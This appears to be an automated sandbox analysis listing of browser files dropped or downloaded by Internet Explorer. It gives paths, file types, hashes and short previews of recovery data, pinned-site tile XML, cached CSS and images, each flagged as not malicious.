                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B186EE54-C4D0-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):363708
                                                                                                                                                                                                                                                            Entropy (8bit):3.626870498350344
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:IZ/2Bfcdmu5kgTzGtyZ/2Bfc+mu5kgTzGtqZ/2Bfcdmu5kgTzGtCZ/2Bfc+mu5kj:hVA5S
                                                                                                                                                                                                                                                            MD5:4EBACF1EEC430CFC0E0DDC8BBF050DA7
                                                                                                                                                                                                                                                            SHA1:A817994686701930079D19D8F10C977E1D694547
                                                                                                                                                                                                                                                            SHA-256:F0DAE40514C75956288E8B8DF88219518C588B1E535489C75074EF0A980676ED
                                                                                                                                                                                                                                                            SHA-512:23867597B8207B2D6556F26AF0D8987D849487D87B98530A34BACBF1F0D132EDC8DD2CD416B5DD4545399784E7D8CF888DA99D007A643D6F350AD5913E2E6596
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BA8A15FC-C4D0-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):19032
                                                                                                                                                                                                                                                            Entropy (8bit):1.5848266349806996
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:IwnGcpryGwpaBG4pQ9GrapbSmGQpKwG7HpRjTGIpX2oGApm:rNZ6QT6dBSeALTJFzg
                                                                                                                                                                                                                                                            MD5:E8A289FE97C2BA1318A5BDE4CBF14172
                                                                                                                                                                                                                                                            SHA1:F36BC61563D9F3507CCDE37A7DD85B6E048CFFB0
                                                                                                                                                                                                                                                            SHA-256:F30868B51308073BF178CDA189645B5EA8A6224003F3A4BFFE1B733D43461677
                                                                                                                                                                                                                                                            SHA-512:C4E3662FB318CCCEE4F162DA7A5407297F5AF90C095A20C5EBA35552B7E7F03EF4732B222B92675B75C7E2A29D7CFC2B2034D28759A8AA89C63FDCD427290C90
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F8ED9647-C4D0-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):16984
                                                                                                                                                                                                                                                            Entropy (8bit):1.5746460422818926
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:IwOH1GcprgHOGwpatH1G4pQbHnGrapbS4GQpBuGHHpc3TGUpG:rmZBQF63BSAj92BA
                                                                                                                                                                                                                                                            MD5:3681FE462DCAEC273B4020335E8EC838
                                                                                                                                                                                                                                                            SHA1:E24AB51CFB5616CE68B847FF9C966B57FEEDBA5D
                                                                                                                                                                                                                                                            SHA-256:B4764ED1F3FD9E3C744C3B6DC1E49BEFE583F503ADE542077CAE2AB3D42B3F7A
                                                                                                                                                                                                                                                            SHA-512:FD39150D6496BBF54266DDEF8D4A451EB808385AB4D69C9E86D4CC85B121E7C8E5F268BAEA5B12C453E48C4839D332F9FFA40125E60DA604216869355BB290C7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):656
                                                                                                                                                                                                                                                            Entropy (8bit):5.103269926155375
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNxOE+cGcznWimI002EtM3MHdNMNxOE+cGcznWimI00ObVbkEtMb:2d6NxOypzSZHKd6NxOypzSZ76b
                                                                                                                                                                                                                                                            MD5:81855DA39232D08C8FF2781C8A3F7DA8
                                                                                                                                                                                                                                                            SHA1:408C94E8288AE53C95433E2049B263231CA7DD34
                                                                                                                                                                                                                                                            SHA-256:5AFBCE933A02DE3C242F02FB9D283AD2B84624DF5073F46422B45E53919560C4
                                                                                                                                                                                                                                                            SHA-512:ED957751EFBA1EA4CDED68CED46E3EE5F01CDCE05D252E9D7F75742FECEF54C76A6DBB5BBA7D52C0FA16D7640E8861240C0B9276ECE65CBADD4C46B158107852
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):653
                                                                                                                                                                                                                                                            Entropy (8bit):5.112473074346821
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNxe2kbnWimI002EtM3MHdNMNxe2kbnWimI00Obkak6EtMb:2d6Nxr6SZHKd6Nxr6SZ7Aa7b
                                                                                                                                                                                                                                                            MD5:BAB6760D41B69F50915489DBD3DDC08A
                                                                                                                                                                                                                                                            SHA1:463F3C266227C5B50F9F1602E27A7A5E4F081688
                                                                                                                                                                                                                                                            SHA-256:A1B45C9DE9E4555FA87E466023778A5D729841C82F2DE9F11A369E3926DFC348
                                                                                                                                                                                                                                                            SHA-512:12B92EE830C4A5B480326E4D8DCF4C56B224504D0363C2874673D56B2039021A26A6E93D236551ED6AF33144F4691A5F8DA5758ABF0795BD3814C0B0404E030A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x8bba7782,0x01d758dd</date><accdate>0x8bba7782,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x8bba7782,0x01d758dd</date><accdate>0x8bba7782,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):662
                                                                                                                                                                                                                                                            Entropy (8bit):5.1199810202200435
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNxvL+cGcznWimI002EtM3MHdNMNxvL+cGcznWimI00ObmZEtMb:2d6NxvFpzSZHKd6NxvFpzSZ7mb
                                                                                                                                                                                                                                                            MD5:4AA736E463A024184748B26DF2FD125A
                                                                                                                                                                                                                                                            SHA1:1FDFF454F1960E77ECA978FA569E0365D0E6E76C
                                                                                                                                                                                                                                                            SHA-256:E80B016EF7288CB97760AD44E6413BA6B3B1F03D685A53B24CBF74D066847176
                                                                                                                                                                                                                                                            SHA-512:F16F2B036A34F3F074BDDE38C04393EB72CA5D103A2A1FFC28F346248DF55706CD8C9D1AAFC7F3398FD4F3E3A88C74D613C178ACB5EACFD123445051C25926D6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):647
                                                                                                                                                                                                                                                            Entropy (8bit):5.088056581351062
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNxi9nWimI002EtM3MHdNMNxi9nWimI00Obd5EtMb:2d6NxeSZHKd6NxeSZ7Jjb
                                                                                                                                                                                                                                                            MD5:47320AAB125C3CC44339CEF3A1096A50
                                                                                                                                                                                                                                                            SHA1:BB3042CF342B61BDDB673D13AF792EAD60513A72
                                                                                                                                                                                                                                                            SHA-256:E8B78A68ABA77E98E0E936EFFE5ADFAA9FFC09FCB716AB2B48B0AE2BB91F59AF
                                                                                                                                                                                                                                                            SHA-512:C5A3EE951585C1C80E350D38458C09CA23DFA14586C72976C05DD4523B0F1E935F769E54B18E8F3F632A8357F7D68B1D6CB151A0ED4B6C2428A8B30A311C55D7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):656
                                                                                                                                                                                                                                                            Entropy (8bit):5.134370425704248
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNxhGw+cGcznWimI002EtM3MHdNMNxhGw+cGcznWimI00Ob8K075EtMb:2d6NxQepzSZHKd6NxQepzSZ7YKajb
                                                                                                                                                                                                                                                            MD5:0D7B87EEBC8D955479834BB09EAD55E7
                                                                                                                                                                                                                                                            SHA1:D4C87C41184B26718562665186451EEC734518E9
                                                                                                                                                                                                                                                            SHA-256:77D23D55E4FD1602CBECD2AB76C244FE3952223A026D6D88A7FF69948B9DE4D4
                                                                                                                                                                                                                                                            SHA-512:1A26C09866DE8CD5FB79D75BA2DF9020BB6340F8CF5BF964D84C9897C0E94E6A7C4A40788156616B84DD5F0177861CA019C3AC82B50E14B14660B7E075984346
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):653
                                                                                                                                                                                                                                                            Entropy (8bit):5.088340896426102
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNx0n9nWimI002EtM3MHdNMNx0nTcznWimI00ObxEtMb:2d6Nx09SZHKd6Nx04zSZ7nb
                                                                                                                                                                                                                                                            MD5:12DB78F4765726CCD42949F0A7FE1453
                                                                                                                                                                                                                                                            SHA1:54143BA22C339E5DE55F2DBBEB0FFE8B80EAF791
                                                                                                                                                                                                                                                            SHA-256:B8FA64DC56A80972FFE9007D384CB602133D606DF5A097548580CAC5B455312C
                                                                                                                                                                                                                                                            SHA-512:393009CE2154313D10257EA3E7B80EBAEF8229F1E5E560BC9E9C65DA397AB1ECC9B1839C78BC172E698CB2B8AA78751B71877BEEAC0CD5899D6B6E2293D81976
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):656
                                                                                                                                                                                                                                                            Entropy (8bit):5.113023654765146
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNxx9nWimI002EtM3MHdNMNxx9nWimI00Ob6Kq5EtMb:2d6NxPSZHKd6NxPSZ7ob
                                                                                                                                                                                                                                                            MD5:F089911066491192B09DC340E911A566
                                                                                                                                                                                                                                                            SHA1:0B91E6F6FDAC33A2B02588D51D36626382C521EE
                                                                                                                                                                                                                                                            SHA-256:B5760E472CFBE3DA4F493782C3C3BE7B88260025B3083AED27A355BCD38FDA66
                                                                                                                                                                                                                                                            SHA-512:F588812ADA0E17B9D15A8281C3B71329D4F04283664711F738E8625791DF7F94EC3792F8E0B6E4463AC2972F676CD6FB4CF7F326466CDC7E4919C45699A616BD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):659
                                                                                                                                                                                                                                                            Entropy (8bit):5.088955333339333
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNxc9nWimI002EtM3MHdNMNxc9nWimI00ObVEtMb:2d6NxwSZHKd6NxwSZ7Db
                                                                                                                                                                                                                                                            MD5:BA115BA37B1DA8980EC52DC8D0880BB5
                                                                                                                                                                                                                                                            SHA1:D1743AC020BF3AB07CB146DF34B35FCF9A687E9D
                                                                                                                                                                                                                                                            SHA-256:B543E5F25973399E0AF42803A368E2BC753B2542C0D8A0C453E6BC66E8EE88C9
                                                                                                                                                                                                                                                            SHA-512:2D0AF6786A7BFA8EEA46292F2A7F9408043C6C59C066A5A66881D9761BF4B6E69CE0CB182F9708C4EC5C4BDD7B9EE6FF7B7A2B78DBF5CBAA65A2132C44E5B865
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):653
                                                                                                                                                                                                                                                            Entropy (8bit):5.073932096315963
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TMHdNMNxfn9nWimI002EtM3MHdNMNxfn9nWimI00Obe5EtMb:2d6NxlSZHKd6NxlSZ7ijb
                                                                                                                                                                                                                                                            MD5:36A965214B304CAB21FB4AD0C75DDE13
                                                                                                                                                                                                                                                            SHA1:6AD6E3DA3806105AC75874DD124717F3D7A3F9EA
                                                                                                                                                                                                                                                            SHA-256:4ED4A3134485499E949FE54F3DEB11E843F65AAA4286AA417B0DB737EA6690F4
                                                                                                                                                                                                                                                            SHA-512:1DC1EF88319DED0B4B0D70E6A13610F10E67E69D48BC0FE2B2EDCE160E6A9F113750E93E52091C16F60A86946625F39D809FC5A55D9DEDDDDA8D7AED7883CA25
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):934
                                                                                                                                                                                                                                                            Entropy (8bit):7.034055492260055
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGVQ:u6tWu/6symC+PTCq5TcBUX4b7Q
                                                                                                                                                                                                                                                            MD5:67E92A0B475076F380340C57C1496E05
                                                                                                                                                                                                                                                            SHA1:D9F32CD03AF2093C145EA2557715F84FE1F5A86F
                                                                                                                                                                                                                                                            SHA-256:67E2D478029275B508B5A1A6458FBA647E9E96D76ABC8AA6C252CB19FE1E92F4
                                                                                                                                                                                                                                                            SHA-512:CF34E4B70642AC34DE649D3E73927DE3E794AB7F195CF624117676F5E55EF48418BE90AF5AD1D88589B5FDB51B1AE176CEB95271AADEB12CF98984E3E5AB3610
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ............{.`.....{.`....
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\2d-0e97d4-185735b[1].css
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):249857
                                                                                                                                                                                                                                                            Entropy (8bit):5.295039902555087
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:jaPMUzTAHEkm8OUdvUvOZkru/rpjp4tQH:ja0UzTAHLOUdv1Zkru/rpjp4tQH
                                                                                                                                                                                                                                                            MD5:B16073A9EC93B3B478EC2D5305BAB0E8
                                                                                                                                                                                                                                                            SHA1:446E73EF46D83EE7BE6AFC3F7707D409DFE3FFF3
                                                                                                                                                                                                                                                            SHA-256:6561EBD5D1938217C45AD793DA4DCF4772B5B6E339C2B4A1086AB273EBB0865A
                                                                                                                                                                                                                                                            SHA-512:19B2F38AF4AD3DB28F1823D94928DEABEF5FC5D1B61EF7E4DAE5E242ADB7403C0BE7F30BFAF07A259DB31C35ED9A9A043928FB3655F47D9C063B38E5C3FD9CEF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: @charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .caption span.nativead,.mip a.nativead .caption span.nativead{display:block;margin:.9rem 0 .1rem}.ip a.nativead .caption span.sourcename,.mip a.nativead .caption span.sourcename{margin:.5rem 0 .1rem;max-width:100%}.todaymodule.mediuminfopanehero .ip_
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAKAE0g[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):9865
                                                                                                                                                                                                                                                            Entropy (8bit):7.945114695308577
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:QorlKTaVd4gGQqxBfqcBAcN1MCJhdUvl7JUDQPE8E507Y3:brxVdGjxdBV3dfewQsjMk
                                                                                                                                                                                                                                                            MD5:52109A817CFBF6DEE564EB71BB4294A5
                                                                                                                                                                                                                                                            SHA1:DF141CA658E4D91334491874E66229FA82573C22
                                                                                                                                                                                                                                                            SHA-256:9C6F3F95A3F75664C3779C7F020B1CCCD56B21764208236CF3C320EAAAE2667B
                                                                                                                                                                                                                                                            SHA-512:3D7365EFD1C7D779AB5B2955012E7D4AAFF2B2F260C0C41C75F9911B180B2C384FE32EE67DCC8019027A699E8A4BCF4E6292A60FA90F6419482C7BE96DDD0C60
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKAE0g.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=520&y=248
                                                                                                                                                                                                                                                            Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...O.b9.5.a....2o...$..b....g...9.)y..].......q..*.W-.H.$..R...`...2)..1k.........~.2.....G.......@Y..V.?.......@Y.!..w..e."3/%.)....H.&.p@..g?.......,...y...b..*...........<........*B.5.8..p.e......m....3...F..R.....E...R.........I...{M.?.9.D.T...K...h.1@.h....f..y.H.7#...Dt.,.,Z.\R.@...j}..{.b.=.%Yp9......G..o........r..B....g..m.fkvD8~.}.r?Z.....&.%^.3.JCZ.Y.)..sL.P".....
